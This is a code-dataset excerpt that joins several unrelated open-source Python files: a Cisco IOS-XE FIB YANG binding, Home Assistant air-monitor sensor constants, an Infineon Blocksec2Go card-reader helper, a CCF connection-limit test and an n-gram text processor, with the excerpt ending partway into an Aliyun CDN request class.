self.has_list_ancestor = False
self.ylist_key_names = ['instance_name']
self._child_container_classes = OrderedDict([])
self._child_list_classes = OrderedDict([("fib-entries", ("fib_entries", FibOperData.FibNiEntry.FibEntries))])
self._leafs = OrderedDict([
('instance_name', YLeaf(YType.str, 'instance-name')),
('af', YLeaf(YType.enumeration, 'af')),
('num_pfx', YLeaf(YType.uint32, 'num-pfx')),
('num_pfx_fwd', YLeaf(YType.uint32, 'num-pfx-fwd')),
('num_pfx_non_fwd', YLeaf(YType.uint32, 'num-pfx-non-fwd')),
])
self.instance_name = None
self.af = None
self.num_pfx = None
self.num_pfx_fwd = None
self.num_pfx_non_fwd = None
self.fib_entries = YList(self)
self._segment_path = lambda: "fib-ni-entry" + "[instance-name='" + str(self.instance_name) + "']"
self._absolute_path = lambda: "Cisco-IOS-XE-fib-oper:fib-oper-data/%s" % self._segment_path()
def __setattr__(self, name, value):
self._perform_setattr(FibOperData.FibNiEntry, ['instance_name', 'af', 'num_pfx', 'num_pfx_fwd', 'num_pfx_non_fwd'], name, value)
class FibEntries(Entity):
"""
List of FIB entries
.. attribute:: ip_addr (key)
IP address
**type**\: union of the below types:
**type**\: str
**pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])/(([0\-9])\|([1\-2][0\-9])\|(3[0\-2]))
**type**\: str
**pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(/(([0\-9])\|([0\-9]{2})\|(1[0\-1][0\-9])\|(12[0\-8])))
.. attribute:: instance_name
Instance Name
**type**\: str
.. attribute:: af
Address Family
**type**\: :py:class:`FibAddressFamily <ydk.models.cisco_ios_xe.Cisco_IOS_XE_fib_oper.FibAddressFamily>`
.. attribute:: num_paths
Number of Paths available
**type**\: int
**range:** 0..255
.. attribute:: packets_forwarded
Packets forwarded through this entry
**type**\: int
**range:** 0..18446744073709551615
.. attribute:: octets_forwarded
Octets forwarded through this entry
**type**\: int
**range:** 0..18446744073709551615
.. attribute:: fib_nexthop_entries
List of FIB next\-hop entries
**type**\: list of :py:class:`FibNexthopEntries <ydk.models.cisco_ios_xe.Cisco_IOS_XE_fib_oper.FibOperData.FibNiEntry.FibEntries.FibNexthopEntries>`
"""
_prefix = 'fib-ios-xe-oper'
_revision = '2017-07-04'
def __init__(self):
super(FibOperData.FibNiEntry.FibEntries, self).__init__()
self.yang_name = "fib-entries"
self.yang_parent_name = "fib-ni-entry"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = ['ip_addr']
self._child_container_classes = OrderedDict([])
self._child_list_classes = OrderedDict([("fib-nexthop-entries", ("fib_nexthop_entries", FibOperData.FibNiEntry.FibEntries.FibNexthopEntries))])
self._leafs = OrderedDict([
('ip_addr', YLeaf(YType.str, 'ip-addr')),
('instance_name', YLeaf(YType.str, 'instance-name')),
('af', YLeaf(YType.enumeration, 'af')),
('num_paths', YLeaf(YType.uint8, 'num-paths')),
('packets_forwarded', YLeaf(YType.uint64, 'packets-forwarded')),
('octets_forwarded', YLeaf(YType.uint64, 'octets-forwarded')),
])
self.ip_addr = None
self.instance_name = None
self.af = None
self.num_paths = None
self.packets_forwarded = None
self.octets_forwarded = None
self.fib_nexthop_entries = YList(self)
self._segment_path = lambda: "fib-entries" + "[ip-addr='" + str(self.ip_addr) + "']"
def __setattr__(self, name, value):
self._perform_setattr(FibOperData.FibNiEntry.FibEntries, ['ip_addr', 'instance_name', 'af', 'num_paths', 'packets_forwarded', 'octets_forwarded'], name, value)
class FibNexthopEntries(Entity):
"""
List of FIB next\-hop entries
.. attribute:: nh_addr (key)
IP Address
**type**\: union of the below types:
**type**\: str
**pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])/(([0\-9])\|([1\-2][0\-9])\|(3[0\-2]))
**type**\: str
**pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(/(([0\-9])\|([0\-9]{2})\|(1[0\-1][0\-9])\|(12[0\-8])))
.. attribute:: index
Unique Next\-hop Path Index
**type**\: int
**range:** 0..4294967295
.. attribute:: af
Address Family
**type**\: :py:class:`FibAddressFamily <ydk.models.cisco_ios_xe.Cisco_IOS_XE_fib_oper.FibAddressFamily>`
.. attribute:: ifname
Output Interface Name
**type**\: str
.. attribute:: path_type
FIB path type
**type**\: :py:class:`FibPathType <ydk.models.cisco_ios_xe.Cisco_IOS_XE_fib_oper.FibPathType>`
.. attribute:: path_id
Unique Next\-hop Path Index
**type**\: int
**range:** 0..4294967295
.. attribute:: weight
Next\-hop weight
**type**\: int
**range:** 0..255
.. attribute:: encap
Encap Header Type
**type**\: :py:class:`EncapsulationHeaderType <ydk.models.cisco_ios_xe.Cisco_IOS_XE_fib_oper.EncapsulationHeaderType>`
.. attribute:: decap
Decap Header Type
**type**\: :py:class:`EncapsulationHeaderType <ydk.models.cisco_ios_xe.Cisco_IOS_XE_fib_oper.EncapsulationHeaderType>`
"""
_prefix = 'fib-ios-xe-oper'
_revision = '2017-07-04'
def __init__(self):
super(FibOperData.FibNiEntry.FibEntries.FibNexthopEntries, self).__init__()
self.yang_name = "fib-nexthop-entries"
self.yang_parent_name = "fib-entries"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = ['nh_addr']
self._child_container_classes = OrderedDict([])
self._child_list_classes = OrderedDict([])
self._leafs = OrderedDict([
('nh_addr', YLeaf(YType.str, 'nh-addr')),
('index', YLeaf(YType.uint32, 'index')),
('af', YLeaf(YType.enumeration, 'af')),
('ifname', YLeaf(YType.str, 'ifname')),
('path_type', YLeaf(YType.enumeration, 'path-type')),
('path_id', YLeaf(YType.uint32, 'path-id')),
('weight', YLeaf(YType.uint8, 'weight')),
('encap', YLeaf(YType.enumeration, 'encap')),
('decap', YLeaf(YType.enumeration, 'decap')),
])
self.nh_addr = None
self.index = None
self.af = None
self.ifname = None
self.path_type = None
self.path_id = None
self.weight = None
self.encap = None
self.decap = None
self._segment_path = lambda: "fib-nexthop-entries" + "[nh-addr='" + str(self.nh_addr) + "']"
def __setattr__(self, name, value):
self._perform_setattr(FibOperData.FibNiEntry.FibEntries.FibNexthopEntries, ['nh_addr', 'index', 'af', 'ifname', 'path_type', 'path_id', 'weight', 'encap', 'decap'], name, value)
def clone_ptr(self):
self._top_entity = FibOperData()
return self._top_entity
| 34.105832 | 299 | 0.524793 |
81d600188a7510dffd890a3808730f64c0ea6089 | 880 | py | Python | python/tests/transformers/named_image_VGG16_test.py | flysky1991/spark-deep-learning | 36e9b105f8df57680f8cf7cb112125d555a14ce9 | [
"Apache-2.0"
] | 1 | 2019-02-25T15:02:19.000Z | 2019-02-25T15:02:19.000Z | python/tests/transformers/named_image_VGG16_test.py | jennifer19/spark-deep-learning | e3c5876fb610ede37e43716a5c3cfd76a5a8464b | [
"Apache-2.0"
] | null | null | null | python/tests/transformers/named_image_VGG16_test.py | jennifer19/spark-deep-learning | e3c5876fb610ede37e43716a5c3cfd76a5a8464b | [
"Apache-2.0"
] | 2 | 2020-02-08T06:51:36.000Z | 2020-06-18T05:38:09.000Z | # Copyright 2017 Databricks, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import os
from .named_image_test import NamedImageTransformerBaseTestCase
class NamedImageTransformerVGG16Test(NamedImageTransformerBaseTestCase):
__test__ = os.getenv('RUN_ONLY_LIGHT_TESTS', False) != "True"
name = "VGG16"
numPartitionsOverride = 1 # hits OOM if more than 2 threads
| 36.666667 | 74 | 0.770455 |
85472deba06c689b7b7973af427e23561ab49f2a | 7,233 | py | Python | homeassistant/components/nam/const.py | nickna/core | c682d5d5e430de52e3da7e06026cd8b4087e864f | [
"Apache-2.0"
] | 5 | 2019-02-24T11:46:18.000Z | 2019-05-28T17:37:21.000Z | homeassistant/components/nam/const.py | flexy2dd/core | 1019ee22ff13e5f542e868179d791e6a0d87369a | [
"Apache-2.0"
] | 77 | 2020-07-16T16:43:09.000Z | 2022-03-31T06:14:37.000Z | homeassistant/components/nam/const.py | Vaarlion/core | f3de8b9f28de01abf72c0f5bb0b457eb1841f201 | [
"Apache-2.0"
] | 1 | 2020-03-09T19:15:38.000Z | 2020-03-09T19:15:38.000Z | """Constants for Nettigo Air Monitor integration."""
from __future__ import annotations
from datetime import timedelta
from typing import Final
from homeassistant.components.sensor import (
STATE_CLASS_MEASUREMENT,
SensorEntityDescription,
)
from homeassistant.const import (
CONCENTRATION_MICROGRAMS_PER_CUBIC_METER,
CONCENTRATION_PARTS_PER_MILLION,
DEVICE_CLASS_CO2,
DEVICE_CLASS_HUMIDITY,
DEVICE_CLASS_PRESSURE,
DEVICE_CLASS_SIGNAL_STRENGTH,
DEVICE_CLASS_TEMPERATURE,
DEVICE_CLASS_TIMESTAMP,
PERCENTAGE,
PRESSURE_HPA,
SIGNAL_STRENGTH_DECIBELS_MILLIWATT,
TEMP_CELSIUS,
)
SUFFIX_P0: Final = "_p0"
SUFFIX_P1: Final = "_p1"
SUFFIX_P2: Final = "_p2"
SUFFIX_P4: Final = "_p4"
ATTR_BME280_HUMIDITY: Final = "bme280_humidity"
ATTR_BME280_PRESSURE: Final = "bme280_pressure"
ATTR_BME280_TEMPERATURE: Final = "bme280_temperature"
ATTR_BMP280_PRESSURE: Final = "bmp280_pressure"
ATTR_BMP280_TEMPERATURE: Final = "bmp280_temperature"
ATTR_DHT22_HUMIDITY: Final = "dht22_humidity"
ATTR_DHT22_TEMPERATURE: Final = "dht22_temperature"
ATTR_HECA_HUMIDITY: Final = "heca_humidity"
ATTR_HECA_TEMPERATURE: Final = "heca_temperature"
ATTR_MHZ14A_CARBON_DIOXIDE: Final = "mhz14a_carbon_dioxide"
ATTR_SDS011: Final = "sds011"
ATTR_SDS011_P1: Final = f"{ATTR_SDS011}{SUFFIX_P1}"
ATTR_SDS011_P2: Final = f"{ATTR_SDS011}{SUFFIX_P2}"
ATTR_SHT3X_HUMIDITY: Final = "sht3x_humidity"
ATTR_SHT3X_TEMPERATURE: Final = "sht3x_temperature"
ATTR_SIGNAL_STRENGTH: Final = "signal"
ATTR_SPS30: Final = "sps30"
ATTR_SPS30_P0: Final = f"{ATTR_SPS30}{SUFFIX_P0}"
ATTR_SPS30_P1: Final = f"{ATTR_SPS30}{SUFFIX_P1}"
ATTR_SPS30_P2: Final = f"{ATTR_SPS30}{SUFFIX_P2}"
ATTR_SPS30_P4: Final = f"{ATTR_SPS30}{SUFFIX_P4}"
ATTR_UPTIME: Final = "uptime"
DEFAULT_NAME: Final = "Nettigo Air Monitor"
DEFAULT_UPDATE_INTERVAL: Final = timedelta(minutes=6)
DOMAIN: Final = "nam"
MANUFACTURER: Final = "Nettigo"
MIGRATION_SENSORS: Final = [
("temperature", ATTR_DHT22_TEMPERATURE),
("humidity", ATTR_DHT22_HUMIDITY),
]
SENSORS: Final[tuple[SensorEntityDescription, ...]] = (
SensorEntityDescription(
key=ATTR_BME280_HUMIDITY,
name=f"{DEFAULT_NAME} BME280 Humidity",
unit_of_measurement=PERCENTAGE,
device_class=DEVICE_CLASS_HUMIDITY,
state_class=STATE_CLASS_MEASUREMENT,
),
SensorEntityDescription(
key=ATTR_BME280_PRESSURE,
name=f"{DEFAULT_NAME} BME280 Pressure",
unit_of_measurement=PRESSURE_HPA,
device_class=DEVICE_CLASS_PRESSURE,
state_class=STATE_CLASS_MEASUREMENT,
),
SensorEntityDescription(
key=ATTR_BME280_TEMPERATURE,
name=f"{DEFAULT_NAME} BME280 Temperature",
unit_of_measurement=TEMP_CELSIUS,
device_class=DEVICE_CLASS_TEMPERATURE,
state_class=STATE_CLASS_MEASUREMENT,
),
SensorEntityDescription(
key=ATTR_BMP280_PRESSURE,
name=f"{DEFAULT_NAME} BMP280 Pressure",
unit_of_measurement=PRESSURE_HPA,
device_class=DEVICE_CLASS_PRESSURE,
state_class=STATE_CLASS_MEASUREMENT,
),
SensorEntityDescription(
key=ATTR_BMP280_TEMPERATURE,
name=f"{DEFAULT_NAME} BMP280 Temperature",
unit_of_measurement=TEMP_CELSIUS,
device_class=DEVICE_CLASS_TEMPERATURE,
state_class=STATE_CLASS_MEASUREMENT,
),
SensorEntityDescription(
key=ATTR_HECA_HUMIDITY,
name=f"{DEFAULT_NAME} HECA Humidity",
unit_of_measurement=PERCENTAGE,
device_class=DEVICE_CLASS_HUMIDITY,
state_class=STATE_CLASS_MEASUREMENT,
),
SensorEntityDescription(
key=ATTR_HECA_TEMPERATURE,
name=f"{DEFAULT_NAME} HECA Temperature",
unit_of_measurement=TEMP_CELSIUS,
device_class=DEVICE_CLASS_TEMPERATURE,
state_class=STATE_CLASS_MEASUREMENT,
),
SensorEntityDescription(
key=ATTR_MHZ14A_CARBON_DIOXIDE,
name=f"{DEFAULT_NAME} MH-Z14A Carbon Dioxide",
unit_of_measurement=CONCENTRATION_PARTS_PER_MILLION,
device_class=DEVICE_CLASS_CO2,
state_class=STATE_CLASS_MEASUREMENT,
),
SensorEntityDescription(
key=ATTR_SDS011_P1,
name=f"{DEFAULT_NAME} SDS011 Particulate Matter 10",
unit_of_measurement=CONCENTRATION_MICROGRAMS_PER_CUBIC_METER,
icon="mdi:blur",
state_class=STATE_CLASS_MEASUREMENT,
),
SensorEntityDescription(
key=ATTR_SDS011_P2,
name=f"{DEFAULT_NAME} SDS011 Particulate Matter 2.5",
unit_of_measurement=CONCENTRATION_MICROGRAMS_PER_CUBIC_METER,
icon="mdi:blur",
state_class=STATE_CLASS_MEASUREMENT,
),
SensorEntityDescription(
key=ATTR_SHT3X_HUMIDITY,
name=f"{DEFAULT_NAME} SHT3X Humidity",
unit_of_measurement=PERCENTAGE,
device_class=DEVICE_CLASS_HUMIDITY,
state_class=STATE_CLASS_MEASUREMENT,
),
SensorEntityDescription(
key=ATTR_SHT3X_TEMPERATURE,
name=f"{DEFAULT_NAME} SHT3X Temperature",
unit_of_measurement=TEMP_CELSIUS,
device_class=DEVICE_CLASS_TEMPERATURE,
state_class=STATE_CLASS_MEASUREMENT,
),
SensorEntityDescription(
key=ATTR_SPS30_P0,
name=f"{DEFAULT_NAME} SPS30 Particulate Matter 1.0",
unit_of_measurement=CONCENTRATION_MICROGRAMS_PER_CUBIC_METER,
icon="mdi:blur",
state_class=STATE_CLASS_MEASUREMENT,
),
SensorEntityDescription(
key=ATTR_SPS30_P1,
name=f"{DEFAULT_NAME} SPS30 Particulate Matter 10",
unit_of_measurement=CONCENTRATION_MICROGRAMS_PER_CUBIC_METER,
icon="mdi:blur",
state_class=STATE_CLASS_MEASUREMENT,
),
SensorEntityDescription(
key=ATTR_SPS30_P2,
name=f"{DEFAULT_NAME} SPS30 Particulate Matter 2.5",
unit_of_measurement=CONCENTRATION_MICROGRAMS_PER_CUBIC_METER,
icon="mdi:blur",
state_class=STATE_CLASS_MEASUREMENT,
),
SensorEntityDescription(
key=ATTR_SPS30_P4,
name=f"{DEFAULT_NAME} SPS30 Particulate Matter 4.0",
unit_of_measurement=CONCENTRATION_MICROGRAMS_PER_CUBIC_METER,
icon="mdi:blur",
state_class=STATE_CLASS_MEASUREMENT,
),
SensorEntityDescription(
key=ATTR_DHT22_HUMIDITY,
name=f"{DEFAULT_NAME} DHT22 Humidity",
unit_of_measurement=PERCENTAGE,
device_class=DEVICE_CLASS_HUMIDITY,
state_class=STATE_CLASS_MEASUREMENT,
),
SensorEntityDescription(
key=ATTR_DHT22_TEMPERATURE,
name=f"{DEFAULT_NAME} DHT22 Temperature",
unit_of_measurement=TEMP_CELSIUS,
device_class=DEVICE_CLASS_TEMPERATURE,
state_class=STATE_CLASS_MEASUREMENT,
),
SensorEntityDescription(
key=ATTR_SIGNAL_STRENGTH,
name=f"{DEFAULT_NAME} Signal Strength",
unit_of_measurement=SIGNAL_STRENGTH_DECIBELS_MILLIWATT,
device_class=DEVICE_CLASS_SIGNAL_STRENGTH,
entity_registry_enabled_default=False,
state_class=STATE_CLASS_MEASUREMENT,
),
SensorEntityDescription(
key=ATTR_UPTIME,
name=f"{DEFAULT_NAME} Uptime",
device_class=DEVICE_CLASS_TIMESTAMP,
entity_registry_enabled_default=False,
),
)
| 35.11165 | 69 | 0.72819 |
0617c24b5f530cfc306b89618fff1f73b328c8b7 | 3,521 | py | Python | CardReader.py | schettn/ChainMeUp | 5665cc1cb7eb124f16e49f980e955d21e8845578 | [
"MIT"
] | null | null | null | CardReader.py | schettn/ChainMeUp | 5665cc1cb7eb124f16e49f980e955d21e8845578 | [
"MIT"
] | null | null | null | CardReader.py | schettn/ChainMeUp | 5665cc1cb7eb124f16e49f980e955d21e8845578 | [
"MIT"
] | 2 | 2019-12-02T21:46:39.000Z | 2019-12-09T21:54:08.000Z | '''
Created by Simon Possegger on 12.11.2019 as part of the Infineon Hackathon.
This Class asynchronously reads from the card reader
and provides the needed functions to interact with the Infineon Blockchain Security 2Go cards.
'''
import blocksec2go
import hashlib
import os
import json
def initReading():
reader = get_reader()
if reader:
activate_card(reader)
return reader
def get_reader():
reader = None
reader_name = 'Identiv uTrust 3700 F'
while reader is None:
try:
reader = blocksec2go.find_reader(reader_name)
print('Found reader %s' % reader_name)
except Exception as details:
if ('No reader found' == str(details)):
print('No card reader found!', end='\r')
elif ('No card on reader' == str(details)):
print('Found reader, but no card!', end='\r')
else:
print('ERROR: ' + str(details))
raise SystemExit
return reader
def activate_card(reader):
try:
blocksec2go.select_app(reader)
print('Found reader and Security 2Go card!')
except Exception as details:
print('ERROR: %s' % str(details))
raise SystemExit
# Returns true if the card was initiated
def initCard(reader):
try:
if reader is not None:
key_id = blocksec2go.generate_keypair(reader)
print("Generated key on slot: %s" % str(key_id))
return True
else:
return False
except:
return False
def read_public_key(reader, key_id):
try:
if blocksec2go.is_key_valid(reader, key_id): # Check if key is valid
global_counter, counter, key = blocksec2go.get_key_info(reader, key_id)
return key
else:
return None
except Exception as details:
print('ERROR: ' + str(details))
raise SystemExit
def auth(reader, pub):
return verifyPub(reader, pub)
def generateSignature(reader, json_object=None):
if json_object is None:
hash = (hashlib.sha256(b'Hash' + bytearray(os.urandom(10000)))).digest()
else:
block_string = json.dumps(json_object, sort_keys=True)
hash_object = hashlib.sha256(block_string.encode())
hash = hash_object.digest()
try:
global_counter, counter, signature = blocksec2go.generate_signature(reader, 1, hash)
return hash, signature
except:
return None, None
def verifyPub(reader, pub, hash=None, signature=None):
# Generate random hash
if signature is None:
hash, signature = generateSignature(reader, hash)
try:
return blocksec2go.verify_signature(pub, hash, signature)
except Exception as ex:
print("Verification failed because of error: %s" % str(ex))
return False
# testing:
def test():
reader = initReading()
print("Testing read pub:")
pub = read_public_key(reader, 1)
if pub is not None:
print(pub.hex())
else:
print("No pub yet... creating one")
print("Testing init card")
print(initCard(reader))
print("Testing read pub again:")
pub = read_public_key(reader, 1)
print(pub.hex())
print("Testing auth:")
print(auth(reader, read_public_key(reader, 1)))
print("Testing verify pub with custom hash")
hash = (hashlib.sha256(b'OtherHash' + bytearray(os.urandom(10000)))).digest()
print(verifyPub(reader, read_public_key(reader, 1), hash)) | 29.099174 | 94 | 0.629367 |
3204e2fb7428c92292bc48b44385764f4b3d8e26 | 4,046 | py | Python | tests/connections.py | Bamuir3/CCF | 21d819a2a9a6bf087063b6fdefe3722a85c47bbe | [
"Apache-2.0"
] | null | null | null | tests/connections.py | Bamuir3/CCF | 21d819a2a9a6bf087063b6fdefe3722a85c47bbe | [
"Apache-2.0"
] | null | null | null | tests/connections.py | Bamuir3/CCF | 21d819a2a9a6bf087063b6fdefe3722a85c47bbe | [
"Apache-2.0"
] | null | null | null | # Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the Apache 2.0 License.
import infra.e2e_args
import time
import infra.network
import infra.proc
import infra.checker
import contextlib
import resource
import psutil
from loguru import logger as LOG
def run(args):
hosts = ["localhost"] * (4 if args.consensus == "pbft" else 1)
with infra.network.network(
hosts, args.binary_dir, args.debug_nodes, args.perf_nodes, pdb=args.pdb
) as network:
check = infra.checker.Checker()
network.start_and_join(args)
primary, _ = network.find_nodes()
primary_pid = primary.remote.remote.proc.pid
num_fds = psutil.Process(primary_pid).num_fds()
max_fds = num_fds + 150
LOG.success(f"{primary_pid} has {num_fds} open file descriptors")
resource.prlimit(primary_pid, resource.RLIMIT_NOFILE, (max_fds, max_fds))
LOG.success(f"set max fds to {max_fds} on {primary_pid}")
nb_conn = (max_fds - num_fds) * 2
clients = []
with contextlib.ExitStack() as es:
LOG.success(f"Creating {nb_conn} clients")
for i in range(nb_conn):
try:
clients.append(es.enter_context(primary.client("user0")))
LOG.info(f"Created client {i}")
except OSError:
LOG.error(f"Failed to create client {i}")
# Creating clients may not actually create connections/fds. Send messages until we run out of fds
for i, c in enumerate(clients):
if psutil.Process(primary_pid).num_fds() >= max_fds:
LOG.warning(f"Reached fd limit at client {i}")
break
LOG.info(f"Sending as client {i}")
check(c.post("/app/log/private", {"id": 42, "msg": "foo"}), result=True)
try:
clients[-1].post("/app/log/private", {"id": 42, "msg": "foo"})
except Exception:
pass
else:
assert False, "Expected error due to fd limit"
num_fds = psutil.Process(primary_pid).num_fds()
LOG.success(f"{primary_pid} has {num_fds}/{max_fds} open file descriptors")
LOG.info("Disconnecting clients")
clients = []
time.sleep(1)
num_fds = psutil.Process(primary_pid).num_fds()
LOG.success(f"{primary_pid} has {num_fds}/{max_fds} open file descriptors")
with contextlib.ExitStack() as es:
to_create = max_fds - num_fds + 1
LOG.success(f"Creating {to_create} clients")
for i in range(to_create):
clients.append(es.enter_context(primary.client("user0")))
LOG.info(f"Created client {i}")
for i, c in enumerate(clients):
if psutil.Process(primary_pid).num_fds() >= max_fds:
LOG.warning(f"Reached fd limit at client {i}")
break
LOG.info(f"Sending as client {i}")
check(c.post("/app/log/private", {"id": 42, "msg": "foo"}), result=True)
try:
clients[-1].post("/app/log/private", {"id": 42, "msg": "foo"})
except Exception:
pass
else:
assert False, "Expected error due to fd limit"
num_fds = psutil.Process(primary_pid).num_fds()
LOG.success(f"{primary_pid} has {num_fds}/{max_fds} open file descriptors")
LOG.info("Disconnecting clients")
clients = []
time.sleep(1)
num_fds = psutil.Process(primary_pid).num_fds()
LOG.success(f"{primary_pid} has {num_fds}/{max_fds} open file descriptors")
if __name__ == "__main__":
def add(parser):
parser.add_argument(
"-p",
"--package",
help="The enclave package to load (e.g., liblogging)",
default="liblogging",
)
args = infra.e2e_args.cli_args(add)
run(args)
| 36.125 | 109 | 0.571181 |
c6c5c9fbffacf421b23da843e42643cab295bc09 | 5,465 | py | Python | chrome/content/papermachines/processors/ngrams.py | papermachines/papermachines | 6afcde40621bbe6a0554647a27101af83e5f61cf | [
"BSD-2-Clause"
] | 134 | 2015-01-04T11:29:04.000Z | 2022-03-30T22:39:51.000Z | chrome/content/papermachines/processors/ngrams.py | wisliyao/papermachines | 6afcde40621bbe6a0554647a27101af83e5f61cf | [
"BSD-2-Clause"
] | 20 | 2015-02-06T18:42:31.000Z | 2021-11-07T05:19:03.000Z | chrome/content/papermachines/processors/ngrams.py | wisliyao/papermachines | 6afcde40621bbe6a0554647a27101af83e5f61cf | [
"BSD-2-Clause"
] | 16 | 2015-02-14T18:46:58.000Z | 2020-07-24T02:38:11.000Z | #!/usr/bin/python
# -*- coding: utf-8 -*-
import sys
import os
import json
import logging
import traceback
import codecs
import re
import math
import pickle
import copy
import itertools
from collections import Counter, defaultdict
import textprocessor
class NGrams(textprocessor.TextProcessor):
"""
Generate N-grams for a corpus
"""
def _basic_params(self):
self.name = 'ngrams'
self.interval = int(self.named_args.get('interval', 1))
self.min_df = int(self.named_args.get('min_df', 1))
self.n = int(self.named_args.get('n', 1))
self.n = min(max(self.n, 1), 5)
self.top_ngrams = int(self.named_args.get('top_ngrams', 100))
self.start_date = None
self.end_date = None
if self.named_args.get('start_date', '') != '':
try:
self.start_date = \
datetime.strptime(self.named_args['start_date'],
'%Y-%m-%d')
except:
logging.error('Start date {:} not valid! Must be formatted like 2013-01-05'
)
if self.named_args.get('end_date', '') != '':
try:
self.end_date = \
datetime.strptime(self.named_args['end_date'],
'%Y-%m-%d')
except:
logging.error('End date {:} not valid! Must be formatted like 2013-01-05'
)
def _findNgramFreqs(self, filenames):
freqs = Counter()
total_for_interval = 0.0
for filename in filenames:
doc_freqs = self.getNgrams(filename, n=self.n)
for (ngram, value) in doc_freqs.iteritems():
self.doc_freqs[ngram].append(self.metadata[filename]['itemID'
])
freqs[ngram] += value
total_for_interval += float(value)
self.update_progress()
for key in freqs.keys():
freqs[key] /= total_for_interval
return freqs
def _filter_by_df(self):
all_ngrams = len(self.doc_freqs.keys())
rejected = set()
for key in self.doc_freqs.keys():
if len(self.doc_freqs[key]) < self.min_df:
rejected.add(key)
del self.doc_freqs[key]
kept = len(self.doc_freqs.keys())
logging.info('{:} ngrams below threshold'.format(len(rejected)))
logging.info('{:}/{:} = {:.0%} ngrams occured in {:} or more documents'.format(kept,
all_ngrams, 1.0 * kept / all_ngrams, self.min_df))
for interval in self.freqs.keys():
for ngram_text in self.freqs[interval].keys():
if ngram_text in rejected:
del self.freqs[interval][ngram_text]
# rev_enumerate = lambda a: itertools.izip(a, xrange(len(a)))
# self.num_to_ngram = self.doc_freqs.keys()
# self.ngram_to_num = dict(rev_enumerate(self.num_to_ngram))
def _filter_by_avg_value(self):
avg_values = {}
intervals_n = float(len(self.interval_names))
for (ngram, values_over_time) in \
self.ngrams_intervals.iteritems():
avg_values[ngram] = sum(values_over_time) / intervals_n
avg_value_list = sorted(avg_values.values(), reverse=True)
logging.info('range of avg frequencies: {:} to {:}'.format(avg_value_list[-1],
avg_value_list[0]))
min_value = avg_value_list[min(self.top_ngrams - 1,
len(avg_value_list) - 1)]
logging.info('minimum avg ngram frequency: {:%}'.format(min_value))
for (ngram, value) in avg_values.iteritems():
if value < min_value:
del self.ngrams_intervals[ngram]
def process(self):
self.labels = defaultdict(set)
self.split_into_intervals()
self.freqs = {}
self.doc_freqs = defaultdict(list)
self.occupied_intervals = sorted(self.labels.keys())
for interval in self.occupied_intervals:
current_docs = self.labels[interval]
self.freqs[interval] = self._findNgramFreqs(current_docs)
logging.info('ngram counts complete')
self._filter_by_df()
self.ngrams_intervals = {}
for (i, interval) in enumerate(self.interval_names):
if interval in self.occupied_intervals:
ngrams = self.freqs[interval]
for (ngram, value) in ngrams.iteritems():
if ngram not in self.ngrams_intervals:
self.ngrams_intervals[ngram] = [0.0 for x in
self.interval_names]
self.ngrams_intervals[ngram][i] = value
self._filter_by_avg_value()
self.max_freq = max([max(l) for l in
self.ngrams_intervals.values()])
# self.ngrams_intervals = dict((self.num_to_ngram[ngram], values) for ngram, values in self.ngrams_intervals.iteritems())
params = {
'NGRAMS_INTERVALS': self.ngrams_intervals,
'TIMES': self.interval_names,
'MAX_FREQ': self.max_freq,
'NGRAMS_TO_DOCS': dict(self.doc_freqs),
}
self.write_html(params)
if __name__ == '__main__':
try:
processor = NGrams(track_progress=True)
processor.process()
except:
logging.error(traceback.format_exc())
| 35.258065 | 129 | 0.570906 |
8c8cb577623e23d742cde2a67e777dfe41cb3f41 | 1,657 | py | Python | aliyun-python-sdk-dcdn/aliyunsdkdcdn/request/v20180115/DescribeDcdnDomainRealTimeSrcBpsDataRequest.py | sdk-team/aliyun-openapi-python-sdk | 384730d707e6720d1676ccb8f552e6a7b330ec86 | [
"Apache-2.0"
] | null | null | null | aliyun-python-sdk-dcdn/aliyunsdkdcdn/request/v20180115/DescribeDcdnDomainRealTimeSrcBpsDataRequest.py | sdk-team/aliyun-openapi-python-sdk | 384730d707e6720d1676ccb8f552e6a7b330ec86 | [
"Apache-2.0"
] | null | null | null | aliyun-python-sdk-dcdn/aliyunsdkdcdn/request/v20180115/DescribeDcdnDomainRealTimeSrcBpsDataRequest.py | sdk-team/aliyun-openapi-python-sdk | 384730d707e6720d1676ccb8f552e6a7b330ec86 | [
"Apache-2.0"
] | null | null | null | # Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
#
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
from aliyunsdkcore.request import RpcRequest
